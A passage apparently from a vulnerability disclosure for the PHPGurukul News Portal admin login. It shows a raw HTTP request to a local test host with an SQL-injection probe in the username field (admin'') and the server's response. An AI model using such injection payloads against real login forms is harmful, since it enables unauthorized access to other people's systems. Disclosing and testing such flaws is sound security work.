Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/newsportal/admin/Accept-Encoding: gzip, deflateAccept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8Connection: closeusername=admin''&password=Test%40123&login=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sun, 09 Jul 2023 11:02:15 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17X-Powered-By: PHP/8.1.17Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 4733Connection: closeContent-Type: text/html; charset=UTF-8<script>alert('Invalid Details');</script><!DOCTYPE html><html lang="en">    <head>        <meta charset="utf-8">        <meta name="viewport" content="width=device-width, initial-scale=1.0">        <meta name="description" content="News Portal.">        <meta name="author" content="PHPGurukul">                <title>News Portal | Admin Panel</title>[...]

Tag

#chrome